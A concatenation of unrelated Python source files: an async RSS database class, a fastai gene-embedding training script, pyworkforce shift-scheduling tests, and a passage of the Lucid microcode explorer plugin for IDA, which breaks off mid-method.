""",site_url,entry_css,entry_link_css,add_base_url,
site_title_css,site_motto_css,entry_content_css,
author_css,datetime_css,interval_time,base_url,
rss_link)
await conn.close()
return res
#not success,return []
async def insert_rss(self,user_id,xpath_id,site_title,rss_url_name,
rss_content,rss_last_build_time,rss_sha256sum):
conn = await self.select_sql.sql_conn()
res = await conn.fetchrow("""
INSERT INTO rss (user_id,xpath_id,site_title,rss_url_name,
rss_content,rss_last_build_time,rss_sha256sum)
VALUES ($1,$2,$3,$4,$5,$6,$7) RETURNING xpath_id
""", user_id,
xpath_id,
site_title,
rss_url_name,
rss_content,
rss_last_build_time,
rss_sha256sum)
await conn.close()
return res
#not success,return []
async def get_one_rss_from_userid_xpathid(self,user_id,xpath_id):
conn = await self.select_sql.sql_conn()
res = await conn.fetchrow("""
SELECT * FROM rss WHERE user_id = $1 AND xpath_id = $2;
""", user_id,xpath_id)
await conn.close()
return res
#not success,return []
async def get_all_rss_from_userid(self,user_id):
conn = await self.select_sql.sql_conn()
res = await conn.fetch("""
SELECT * FROM rss WHERE user_id = $1
""", user_id)
await conn.close()
#print(f"the user_id is:{user_id}")
#print(f"the rss is:{res}")
if len(res) == 0:
res = [{"site_title": "rss_is_none","rss_url_name": "no_url"}]
return res
#not success,return []
async def get_one_rss_from_url_name(self,url_name):
conn = await self.select_sql.sql_conn()
res = await conn.fetch("""
SELECT * FROM rss WHERE rss_url_name = $1
""", url_name)
await conn.close()
#print(f"the user_id is:{user_id}")
#print(f"the rss is:{res}")
if len(res) == 0:
res = [{"rss_content": "no rss,maybe deleted","rss_url_name": "no_url"}]
return res
#not success,return "do_not_success"
async def update_one_rss_xpath_id(self,rss_content,
rss_sha256sum,xpath_id):
conn = await self.select_sql.sql_conn()
try:
res = await conn.execute("""
UPDATE rss SET rss_content = $1,
rss_sha256sum = $2 WHERE xpath_id = $3
""",rss_content,
rss_sha256sum,xpath_id)
await conn.close()
except:
res = self.do_not_success
return res
else:
return res
#not success,return []
async def delete_one_rss_from_url_name(self,url_name):
conn = await self.select_sql.sql_conn()
res1 = await conn.fetchrow("""
DELETE FROM rss WHERE rss_url_name = $1 RETURNING *
""", url_name)
res2 = await conn.fetchrow("""
DELETE FROM xpath WHERE rss_link = $1 RETURNING *
""",url_name)
await conn.close()
#print(f"the user_id is:{user_id}")
#print(f"the rss is:{res}")
if len(res1) != 0 and len(res2) != 0:
res = self.do_success
else:
res = self.do_not_success
return res
|
39188
|
from __future__ import print_function
from argparse import ArgumentParser
from fastai.learner import *
from fastai.column_data import *
import numpy as np
import pandas as pd
def build_parser():
parser = ArgumentParser()
parser.add_argument('--data', type=str, nargs=None, dest='in_path', help='input file path', required=True)
parser.add_argument('--out-prefix', type=str, nargs=None, dest='model', help='output prefix', required=True)
parser.add_argument('--out-dir', type=str, nargs=None, dest='out_dir', help='output directory', required=True)
parser.add_argument('--num-dim', type=int, nargs=None, dest='num_dim', help='number of dimension of resulting embedding', required=False, default=50)
parser.add_argument('--bs', type=int, nargs=None, dest='bs', help='batch size', required=False, default=64)
parser.add_argument('--num-epoch', type=int, nargs=None, dest='num_eps', help='number of epoch(s)', required=False, default=3)
parser.add_argument('--learning-rate', type=float, nargs=None, dest='lr', help='learning rate', required=False, default=1e-5)
return parser
def main():
parser = build_parser()
opts = parser.parse_args()
if torch.cuda.is_available() and torch.backends.cudnn.enabled:
torch.cuda.set_device(0)
else:
print('CUDA or CUDNN not available.')
return
in_path = opts.in_path
n_factors = opts.num_dim
bs = opts.bs
num_eps = opts.num_eps
lr = opts.lr
out_dir = opts.out_dir
prefix = opts.model
outpath = out_dir+'/'+prefix+'_'
### data preparation
df = pd.read_csv(in_path, sep=',', low_memory=False, index_col=[0], error_bad_lines=False)
sids = list(df.index)
df = df.assign(id=sids)
df = df.reset_index(drop=True)
mdf = pd.melt(df, id_vars=['id'], var_name='gene', value_name='log2exp')
### training
val_idxs = get_cv_idxs(len(mdf))
cd = CollabFilterDataset.from_data_frame(path, mdf, 'id', 'gene', 'log2exp')
learn = cd.get_learner(n_factors, val_idxs, bs, opt_fn=optim.Adam)
learn.fit(lr, num_eps)
learn.save(outpath+'model')
### plot jointplot
preds = learn.predict()
y=learn.data.val_y
jp = sns.jointplot(preds, y, kind='hex', stat_func=None)
jp.set_axis_labels('ground truth log2(exp)', 'predicted log2(exp)')
jp.savefig(outpath+'trn_metric_jointplot.png')
### output embedding
genes = list(df.columns[:-2])
sids = list(df['id'])
geneidx = np.array([cd.item2idx[g] for g in genes])
m=learn.model
m.cuda()
### output gene embedding matrix and bias
gene_emb = to_np(m.i(V(geneidx)))
gene_emb_df = pd.DataFrame(gene_emb, index=genes)
gene_emb_df.to_csv(outpath+'gemb.csv', sep=',')
gene_emb_bias = to_np(m.ib(V(geneidx)))
gene_emb_bias_df = pd.DataFrame(gene_emb_bias, index=genes)
gene_emb_bias_df.to_csv(outpath+'gemb_bias.csv')
### output sample embedding matrix and bias
sampleidx = np.array([cd.user2idx[sid] for sid in sids])
samp_emb = to_np(m.u(V(sampleidx)))
samp_emb_df = pd.DataFrame(samp_emb, index=sids)
samp_emb_df.to_csv(outpath+'semb.csv', sep=',')
samp_emb_bias = to_np(m.ub(V(sampleidx)))
samp_emb_bias_df = pd.DataFrame(samp_emb_bias, index=sids)
samp_emb_bias_df.to_csv(outpath+'semb_bias.csv')
if __name__ == '__main__':
main()
|
39192
|
from pyworkforce.shifts import MinAbsDifference, MinRequiredResources
import pytest
def test_min_abs_difference_schedule():
required_resources = [
[9, 11, 17, 9, 7, 12, 5, 11, 8, 9, 18, 17, 8, 12, 16, 8, 7, 12, 11, 10, 13, 19, 16, 7],
[13, 13, 12, 15, 18, 20, 13, 16, 17, 8, 13, 11, 6, 19, 11, 20, 19, 17, 10, 13, 14, 23, 16, 8]
]
shifts_coverage = {"Morning": [0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
"Afternoon": [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0],
"Night": [1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1],
"Mixed": [0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0]}
num_days = 2
scheduler = MinAbsDifference(num_days=num_days,
periods=24,
shifts_coverage=shifts_coverage,
required_resources=required_resources,
max_period_concurrency=25,
max_shift_concurrency=20)
solution = scheduler.solve()
assert solution['status'] == 'OPTIMAL'
assert 'cost' in solution
assert 'resources_shifts' in solution
assert len(solution['resources_shifts']) == num_days * len(shifts_coverage)
for i in range(num_days * len(shifts_coverage)):
assert solution['resources_shifts'][i]['resources'] >= 0
def test_infeasible_min_abs_difference_schedule():
required_resources = [
[9, 11, 17, 9, 7, 12, 5, 11, 8, 9, 18, 17, 8, 12, 16, 8, 7, 12, 11, 10, 13, 19, 16, 7],
[13, 13, 12, 15, 18, 20, 13, 16, 17, 8, 13, 11, 6, 19, 11, 20, 19, 17, 10, 13, 14, 23, 16, 8]
]
shifts_coverage = {"Morning": [0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
"Afternoon": [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0],
"Night": [1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1],
"Mixed": [0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0]}
num_days = 2
scheduler = MinAbsDifference(num_days=num_days,
periods=24,
shifts_coverage=shifts_coverage,
required_resources=required_resources,
max_period_concurrency=10,
max_shift_concurrency=20)
solution = scheduler.solve()
assert solution['status'] == 'INFEASIBLE'
assert 'cost' in solution
assert 'resources_shifts' in solution
assert solution['cost'] == -1
assert len(solution['resources_shifts']) == 1
assert solution['resources_shifts'][0]['day'] == -1
assert solution['resources_shifts'][0]['shift'] == 'Unknown'
assert solution['resources_shifts'][0]['resources'] == -1
def test_min_required_resources_schedule():
required_resources = [
[9, 11, 17, 9, 7, 12, 5, 11, 8, 9, 18, 17, 8, 12, 16, 8, 7, 12, 11, 10, 13, 19, 16, 7],
[13, 13, 12, 15, 18, 20, 13, 16, 17, 8, 13, 11, 6, 19, 11, 20, 19, 17, 10, 13, 14, 23, 16, 8]
]
shifts_coverage = {"Morning": [0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
"Afternoon": [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0],
"Night": [1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1],
"Mixed": [0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0]}
num_days = 2
scheduler = MinRequiredResources(num_days=num_days,
periods=24,
shifts_coverage=shifts_coverage,
required_resources=required_resources,
max_period_concurrency=25,
max_shift_concurrency=25)
solution = scheduler.solve()
assert solution['status'] == 'OPTIMAL'
assert 'cost' in solution
assert 'resources_shifts' in solution
assert len(solution['resources_shifts']) == num_days * len(shifts_coverage)
for i in range(num_days * len(shifts_coverage)):
assert solution['resources_shifts'][i]['resources'] >= 0
def test_cost_min_required_resources_schedule():
required_resources = [
[9, 11, 17, 9, 7, 12, 5, 11, 8, 9, 18, 17, 8, 12, 16, 8, 7, 12, 11, 10, 13, 19, 16, 7],
[13, 13, 12, 15, 18, 20, 13, 16, 17, 8, 13, 11, 6, 19, 11, 20, 19, 17, 10, 13, 14, 23, 16, 8]
]
shifts_coverage = {"Morning": [0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
"Afternoon": [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0],
"Night": [1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1],
"Mixed": [0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0]}
cost_dict = {"Morning": 8, "Afternoon": 8, "Night": 10, "Mixed": 7}
num_days = 2
scheduler = MinRequiredResources(num_days=num_days,
periods=24,
shifts_coverage=shifts_coverage,
required_resources=required_resources,
cost_dict=cost_dict,
max_period_concurrency=25,
max_shift_concurrency=25)
solution = scheduler.solve()
assert solution['status'] == 'OPTIMAL'
assert 'cost' in solution
assert 'resources_shifts' in solution
assert len(solution['resources_shifts']) == num_days * len(shifts_coverage)
for i in range(num_days * len(shifts_coverage)):
assert solution['resources_shifts'][i]['resources'] >= 0
def test_wrong_cost_min_required_resources_schedule():
required_resources = [
[9, 11, 17, 9, 7, 12, 5, 11, 8, 9, 18, 17, 8, 12, 16, 8, 7, 12, 11, 10, 13, 19, 16, 7],
[13, 13, 12, 15, 18, 20, 13, 16, 17, 8, 13, 11, 6, 19, 11, 20, 19, 17, 10, 13, 14, 23, 16, 8]
]
shifts_coverage = {"Morning": [0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
"Afternoon": [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0],
"Night": [1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1],
"Mixed": [0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0]}
cost_dict = {"Morning": 8, "Night": 10, "Mixed": 7}
num_days = 2
with pytest.raises(Exception) as excinfo:
scheduler = MinRequiredResources(num_days=num_days,
periods=24,
shifts_coverage=shifts_coverage,
required_resources=required_resources,
cost_dict=cost_dict,
max_period_concurrency=25,
max_shift_concurrency=25)
solution = scheduler.solve()
assert str(excinfo.value) == "cost_dict must have the same keys as shifts_coverage"
def test_infeasible_min_required_resources_schedule():
required_resources = [
[9, 11, 17, 9, 7, 12, 5, 11, 8, 9, 18, 17, 8, 12, 16, 8, 7, 12, 11, 10, 13, 19, 16, 7],
[13, 13, 12, 15, 18, 20, 13, 16, 17, 8, 13, 11, 6, 19, 11, 20, 19, 17, 10, 13, 14, 23, 16, 8]
]
shifts_coverage = {"Morning": [0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
"Afternoon": [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0],
"Night": [1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1],
"Mixed": [0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0]}
num_days = 2
scheduler = MinRequiredResources(num_days=num_days,
periods=24,
shifts_coverage=shifts_coverage,
required_resources=required_resources,
max_period_concurrency=25,
max_shift_concurrency=20)
solution = scheduler.solve()
assert solution['status'] == 'INFEASIBLE'
assert 'cost' in solution
assert 'resources_shifts' in solution
assert solution['cost'] == -1
assert len(solution['resources_shifts']) == 1
assert solution['resources_shifts'][0]['day'] == -1
assert solution['resources_shifts'][0]['shift'] == 'Unknown'
assert solution['resources_shifts'][0]['resources'] == -1
|
39359
|
import ctypes
import ida_ida
import ida_funcs
import ida_graph
import ida_idaapi
import ida_kernwin
import ida_hexrays
from PyQt5 import QtWidgets, QtGui, QtCore, sip
from lucid.ui.sync import MicroCursorHighlight
from lucid.ui.subtree import MicroSubtreeView
from lucid.util.python import register_callback, notify_callback
from lucid.util.hexrays import get_microcode, get_mmat, get_mmat_name, get_mmat_levels
from lucid.microtext import MicrocodeText, MicroInstructionToken, MicroOperandToken, AddressToken, BlockNumberToken, translate_mtext_position, remap_mtext_position
#------------------------------------------------------------------------------
# Microcode Explorer
#------------------------------------------------------------------------------
#
# The Microcode Explorer UI is mostly implemented following a standard
# Model-View-Controller pattern. This is a little abnormal for Qt, but
# I've come to appreciate it more for its portability and testability.
#
class MicrocodeExplorer(object):
"""
The controller component of the microcode explorer.
The role of the controller is to handle user gestures, map user actions to
model updates, and change views based on controls. In theory, the
controller should be able to drive the 'view' headlessly or simulate user
UI interaction.
"""
def __init__(self):
self.model = MicrocodeExplorerModel()
self.view = MicrocodeExplorerView(self, self.model)
self.view._code_sync.enable_sync(True) # XXX/HACK
def show(self, address=None):
"""
Show the microcode explorer.
"""
if address is None:
address = ida_kernwin.get_screen_ea()
self.select_function(address)
self.view.show()
def show_subtree(self, insn_token):
"""
Show the sub-instruction graph for the given instruction token.
"""
graph = MicroSubtreeView(insn_token.insn)
graph.show()
# TODO/HACK: this is dumb, but moving it breaks my centering code so
# i'll figure it out later...
gv = ida_graph.get_graph_viewer(graph.GetWidget())
ida_graph.viewer_set_titlebar_height(gv, 15)
#-------------------------------------------------------------------------
# View Toggles
#-------------------------------------------------------------------------
def set_highlight_mutual(self, status):
"""
Toggle the highlighting of lines containing the same active address.
"""
if status:
self.view._code_sync.hook()
else:
self.view._code_sync.unhook()
ida_kernwin.refresh_idaview_anyway()
def set_verbose(self, status):
"""
Toggle the verbosity of the printed microcode text.
"""
self.model.verbose = status
ida_kernwin.refresh_idaview_anyway()
#-------------------------------------------------------------------------
# View Controls
#-------------------------------------------------------------------------
def select_function(self, address):
"""
Switch the microcode view to the specified function.
"""
func = ida_funcs.get_func(address)
if not func:
return False
for maturity in get_mmat_levels():
mba = get_microcode(func, maturity)
mtext = MicrocodeText(mba, self.model.verbose)
self.model.update_mtext(mtext, maturity)
self.view.refresh()
ida_kernwin.refresh_idaview_anyway()
return True
def select_maturity(self, maturity_name):
"""
Switch the microcode view to the specified maturity level.
"""
self.model.active_maturity = get_mmat(maturity_name)
#self.view.refresh()
def select_address(self, address):
"""
Select a token in the microcode view matching the given address.
"""
tokens = self.model.mtext.get_tokens_for_address(address)
if not tokens:
return None
token_line_num, token_x = self.model.mtext.get_pos_of_token(tokens[0])
rel_y = self.model.current_position[2]
if self.model.current_position[2] == 0:
rel_y = 30
self.model.current_position = (token_line_num, token_x, rel_y)
return tokens[0]
def select_position(self, line_num, x, y):
"""
Select the given text position in the microcode view.
"""
self.model.current_position = (line_num, x, y)
#print(" - hovered token: %s" % self.model.current_token.text)
#print(" - hovered taddr: 0x%08X" % self.model.current_token.address)
#print(" - hovered laddr: 0x%08X" % self.model.current_address)
def activate_position(self, line_num, x, y):
"""
Activate (eg. double click) the given text position in the microcode view.
"""
token = self.model.mtext.get_token_at_position(line_num, x)
if isinstance(token, AddressToken):
ida_kernwin.jumpto(token.target_address, -1, 0)
return
if isinstance(token, BlockNumberToken) or (isinstance(token, MicroOperandToken) and token.mop.t == ida_hexrays.mop_b):
blk_idx = token.blk_idx if isinstance(token, BlockNumberToken) else token.mop.b
blk_token = self.model.mtext.blks[blk_idx]
blk_line_num, _ = self.model.mtext.get_pos_of_token(blk_token.lines[0])
self.model.current_position = (blk_line_num, 0, y)
self.view._code_view.Jump(*self.model.current_position)
return
class MicrocodeExplorerModel(object):
"""
The model component of the microcode explorer.
The role of the model is to encapsulate application state, respond to
state queries, and notify views of changes. Ideally, the model could be
serialized / unserialized to save and restore state.
"""
def __init__(self):
#
# 'mtext' is short for MicrocodeText objects (see microtext.py)
#
# this dictionary will contain a mtext object (the renderable text
# mapping of a given hexrays mba_t) for each microcode maturity level
# of the current function.
#
# at any given time, one mtext will be 'active' in the model, and
# therefore visible in the UI/Views
#
self._mtext = {x: None for x in get_mmat_levels()}
#
# there is a 'cursor' (ViewCursor) for each microcode maturity level /
# mtext object. cursors don't actually contain the 'position' in the
# rendered text (line_num, x), but also information to position the
# cursor within the line view (y)
#
self._view_cursors = {x: None for x in get_mmat_levels()}
#
# the currently active / selected maturity level of the model. this
# determines which mtext is currently visible / active in the
# microcode view, and which cursor will be used
#
self._active_maturity = ida_hexrays.MMAT_GENERATED
# this flag tracks the verbosity toggle state
self._verbose = False
#----------------------------------------------------------------------
# Callbacks
#----------------------------------------------------------------------
self._mtext_refreshed_callbacks = []
self._position_changed_callbacks = []
self._maturity_changed_callbacks = []
#-------------------------------------------------------------------------
# Read-Only Properties
#-------------------------------------------------------------------------
@property
def mtext(self):
"""
Return the microcode text mapping for the current maturity level.
"""
return self._mtext[self._active_maturity]
@property
def current_line(self):
"""
Return the line token at the current viewport cursor position.
"""
if not self.mtext:
return None
line_num, _, _ = self.current_position
return self.mtext.lines[line_num]
@property
def current_function(self):
"""
Return the current function address.
"""
if not self.mtext:
return ida_idaapi.BADADDR
return self.mtext.mba.entry_ea
@property
def current_token(self):
"""
Return the token at the current viewport cursor position.
"""
return self.mtext.get_token_at_position(*self.current_position[:2])
@property
def current_address(self):
"""
Return the address at the current viewport cursor position.
"""
return self.mtext.get_address_at_position(*self.current_position[:2])
@property
def current_cursor(self):
"""
Return the current viewport cursor.
"""
return self._view_cursors[self._active_maturity]
#-------------------------------------------------------------------------
# Mutable Properties
#-------------------------------------------------------------------------
@property
def current_position(self):
"""
Return the current viewport cursor position (line_num, view_x, view_y).
"""
return self.current_cursor.viewport_position
@current_position.setter
def current_position(self, value):
"""
Set the cursor position of the viewport.
"""
self._gen_cursors(value, self.active_maturity)
self._notify_position_changed()
@property
def verbose(self):
"""
Return the microcode verbosity status of the viewport.
"""
return self._verbose
@verbose.setter
def verbose(self, value):
"""
Set the verbosity of the microcode displayed by the viewport.
"""
if self._verbose == value:
return
# update the active verbosity setting
self._verbose = value
# verbosity must have changed, so force a mtext refresh
self.refresh_mtext()
@property
def active_maturity(self):
"""
Return the active microcode maturity level.
"""
return self._active_maturity
@active_maturity.setter
def active_maturity(self, new_maturity):
"""
Set the active microcode maturity level.
"""
self._active_maturity = new_maturity
self._notify_maturity_changed()
#----------------------------------------------------------------------
# Misc
#----------------------------------------------------------------------
def update_mtext(self, mtext, maturity):
"""
Set the mtext for a given microcode maturity level.
"""
self._mtext[maturity] = mtext
self._view_cursors[maturity] = ViewCursor(0, 0, 0)
def refresh_mtext(self):
"""
Regenerate the rendered text for all microcode maturity levels.
TODO: This is a bit sloppy, and is basically only used for the
verbosity toggle.
"""
for maturity, mtext in self._mtext.items():
if maturity == self.active_maturity:
new_mtext = MicrocodeText(mtext.mba, self.verbose)
self._mtext[maturity] = new_mtext
self.current_position = translate_mtext_position(self.current_position, mtext, new_mtext)
continue
mtext.refresh(self.verbose)
self._notify_mtext_refreshed()
def _gen_cursors(self, position, mmat_src):
"""
Generate the cursors for all levels from a source position and maturity.
"""
mmat_levels = get_mmat_levels()
mmat_first, mmat_final = mmat_levels[0], mmat_levels[-1]
# clear out all the existing cursor mappings
self._view_cursors = {x: None for x in mmat_levels}
# save the starting cursor
line_num, x, y = position
self._view_cursors[mmat_src] = ViewCursor(line_num, x, y, True)
# map the cursor backwards from the source maturity
mmat_lower = range(mmat_first, mmat_src)[::-1]
current_maturity = mmat_src
for next_maturity in mmat_lower:
self._transfer_cursor(current_maturity, next_maturity)
current_maturity = next_maturity
# map the cursor forward from the source maturity
mmat_higher = range(mmat_src+1, mmat_final + 1)
current_maturity = mmat_src
for next_maturity in mmat_higher:
self._transfer_cursor(current_maturity, next_maturity)
current_maturity = next_maturity
def _transfer_cursor(self, mmat_src, mmat_dst):
"""
Translate the cursor position from one maturity to the next.
"""
position = self._view_cursors[mmat_src].viewport_position
mapped = self._view_cursors[mmat_src].mapped
# attempt to translate the position in one mtext to another
projection = translate_mtext_position(position, self._mtext[mmat_src], self._mtext[mmat_dst])
# if translation failed, we will generate an approximate cursor
if not projection:
mapped = False
projection = remap_mtext_position(position, self._mtext[mmat_src], self._mtext[mmat_dst])
# save the generated cursor
line_num, x, y = projection
self._view_cursors[mmat_dst] = ViewCursor(line_num, x, y, mapped)
#----------------------------------------------------------------------
# Callbacks
#----------------------------------------------------------------------
def mtext_refreshed(self, callback):
"""
Subscribe a callback for mtext refresh events.
"""
register_callback(self._mtext_refreshed_callbacks, callback)
def _notify_mtext_refreshed(self):
"""
Notify listeners of a mtext refresh event.
"""
notify_callback(self._mtext_refreshed_callbacks)
def position_changed(self, callback):
"""
Subscribe a callback for cursor position changed events.
"""
register_callback(self._position_changed_callbacks, callback)
def _notify_position_changed(self):
"""
Notify listeners of a cursor position changed event.
"""
notify_callback(self._position_changed_callbacks)
def maturity_changed(self, callback):
"""
Subscribe a callback for maturity changed events.
"""
register_callback(self._maturity_changed_callbacks, callback)
def _notify_maturity_changed(self):
"""
Notify listeners of a maturity changed event.
"""
notify_callback(self._maturity_changed_callbacks)
#-----------------------------------------------------------------------------
# UI Components
#-----------------------------------------------------------------------------
class MicrocodeExplorerView(QtWidgets.QWidget):
"""
The view component of the Microcode Explorer.
"""
WINDOW_TITLE = "Microcode Explorer"
def __init__(self, controller, model):
super(MicrocodeExplorerView, self).__init__()
self.visible = False
# the backing model, and controller for this view (eg, mvc pattern)
self.model = model
self.controller = controller
# initialize the plugin UI
self._ui_init()
self._ui_init_signals()
#--------------------------------------------------------------------------
# Pseudo Widget Functions
#--------------------------------------------------------------------------
def show(self):
self.refresh()
# show the dockable widget
flags = ida_kernwin.PluginForm.WOPN_DP_RIGHT | 0x200 # WOPN_SZHINT
ida_kernwin.display_widget(self._twidget, flags)
ida_kernwin.set_dock_pos(self.WINDOW_TITLE, "IDATopLevelDockArea", ida_kernwin.DP_RIGHT)
self._code_sync.hook()
def _cleanup(self):
self.visible = False
self._twidget = None
self.widget = None
self._code_sync.unhook()
self._ui_hooks.unhook()
# TODO cleanup controller / model
#--------------------------------------------------------------------------
# Initialization - UI
#--------------------------------------------------------------------------
def _ui_init(self):
"""
Initialize UI elements.
"""
self._ui_init_widget()
# initialize our ui elements
self._ui_init_list()
self._ui_init_code()
self._ui_init_settings()
# layout the populated ui just before showing it
self._ui_layout()
def _ui_init_widget(self):
"""
Initialize an IDA widget for this UI control.
"""
# create a dockable widget, and save a reference to it for later use
self._twidget = ida_kernwin.create_empty_widget(self.WINDOW_TITLE)
# cast the IDA 'twidget' to a less opaque QWidget object
self.widget = ida_kernwin.PluginForm.TWidgetToPyQtWidget(self._twidget)
# hooks to help track the container/widget lifetime
class ExplorerUIHooks(ida_kernwin.UI_Hooks):
def widget_invisible(_, twidget):
if twidget == self._twidget:
self.visible = False
self._cleanup()
def widget_visible(_, twidget):
if twidget == self._twidget:
self.visible = True
# install the widget lifetime hooks
self._ui_hooks = ExplorerUIHooks()
self._ui_hooks.hook()
def _ui_init_list(self):
"""
Initialize the microcode maturity list.
"""
self._maturity_list = LayerListWidget()
def _ui_init_code(self):
"""
Initialize the microcode view(s).
"""
self._code_view = MicrocodeView(self.model)
self._code_sync = MicroCursorHighlight(self.controller, self.model)
self._code_sync.track_view(self._code_view.widget)
def _ui_init_settings(self):
"""
Initialize the explorer settings groupbox.
"""
self._checkbox_cursor = QtWidgets.QCheckBox("Highlight mutual")
self._checkbox_cursor.setCheckState(QtCore.Qt.Checked)
self._checkbox_verbose = QtWidgets.QCheckBox("Show use/def")
self._checkbox_sync = QtWidgets.QCheckBox("Sync hexrays")
self._checkbox_sync.setCheckState(QtCore.Qt.Checked)
self._groupbox_settings = QtWidgets.QGroupBox("Settings")
layout = QtWidgets.QVBoxLayout()
layout.addWidget(self._checkbox_cursor)
layout.addWidget(self._checkbox_verbose)
layout.addWidget(self._checkbox_sync)
self._groupbox_settings.setLayout(layout)
def _ui_layout(self):
"""
Layout the major UI elements of the widget.
"""
layout = QtWidgets.QGridLayout()
# arrange the widgets in a 'grid' row col row span col span
layout.addWidget(self._code_view.widget, 0, 0, 0, 1)
layout.addWidget(self._maturity_list, 0, 1, 1, 1)
layout.addWidget(self._groupbox_settings, 1, 1, 1, 1)
# apply the layout to the widget
self.widget.setLayout(layout)
def _ui_init_signals(self):
"""
Connect UI signals.
"""
self._maturity_list.currentItemChanged.connect(lambda x, y: self.controller.select_maturity(x.text()))
self._code_view.connect_signals(self.controller)
self._code_view.OnClose = self.hide # HACK
# checkboxes
self._checkbox_cursor.stateChanged.connect(lambda x: self.controller.set_highlight_mutual(bool(x)))
self._checkbox_verbose.stateChanged.connect(lambda x: self.controller.set_verbose(bool(x)))
self._checkbox_sync.stateChanged.connect(lambda x: self._code_sync.enable_sync(bool(x)))
# model signals
self.model.mtext_refreshed(self.refresh)
self.model.maturity_changed(self.refresh)
#--------------------------------------------------------------------------
# Misc
#--------------------------------------------------------------------------
def refresh(self):
"""
Refresh the microcode explorer UI based on the model state.
"""
self._maturity_list.setCurrentRow(self.model.active_maturity - 1)
self._code_view.refresh()
class LayerListWidget(QtWidgets.QListWidget):
"""
The microcode maturity list widget
"""
def __init__(self):
super(LayerListWidget, self).__init__()
# populate the list widget with the microcode maturity levels
self.addItems([get_mmat_name(x) for x in get_mmat_levels()])
# select the first maturity level, by default
self.setCurrentRow(0)
# make the list widget a fixed size, slightly wider than it needs to be
width = self.sizeHintForColumn(0)
self.setMaximumWidth(int(width + width * 0.10))
def wheelEvent(self, event):
"""
Handle mouse wheel scroll events.
"""
y = event.angleDelta().y()
# scrolling down, clamp to last row
if y < 0:
next_row = min(self.currentRow()+1, self.count()-1)
# scrolling up, clamp to first row (0)
elif y > 0:
next_row = max(self.currentRow()-1, 0)
# horizontal scroll ? nothing to do..
else:
return
self.setCurrentRow(next_row)
class MicrocodeView(ida_kernwin.simplecustviewer_t):
"""
An IDA-based text area that will render the Hex-Rays microcode.
TODO: I'll probably rip this out in the future, as I'll have finer
control over the interaction / implementation if I just roll my own
microcode text widget.
For that reason, excuse its hacky-ness / lack of comments.
"""
def __init__(self, model):
super(MicrocodeView, self).__init__()
self.model = model
self.Create()
def connect_signals(self, controller):
self.controller = controller
self.OnCursorPosChanged = lambda: controller.select_position(*self.GetPos())
self.OnDblClick = lambda _: controller.activate_position(*self.GetPos())
self.model.position_changed(self.refresh_cursor)
def refresh(self):
self.ClearLines()
for line in self.model.mtext.lines:
self.AddLine(line.tagged_text)
self.refresh_cursor()
def refresh_cursor(self):
if not self.model.current_position:
return
self.Jump(*self.model.current_position)
def Create(self):
if not super(MicrocodeView, self).Create(None):
return False
self._twidget = self.GetWidget()
self.widget = ida_kernwin.PluginForm.TWidgetToPyQtWidget(self._twidget)
return True
def OnClose(self):
pass
def OnCursorPosChanged(self):
pass
def OnDblClick(self, shift):
pass
def OnPopup(self, form, popup_handle):
controller = self.controller
#
# so, i'm pretty picky about my UI / interactions. IDA puts items in
# the right click context menus of custom (code) viewers.
#
# these items aren't really relevant (imo) to the microcode viewer,
# so I do some dirty stuff here to filter them out and ensure only
# my items will appear in the context menu.
#
# there's only one right click context item right now, but in the
# future i'm sure there will be more.
#
class FilterMenu(QtCore.QObject):
def __init__(self, qmenu):
super(QtCore.QObject, self).__init__()
self.qmenu = qmenu
def eventFilter(self, obj, event):
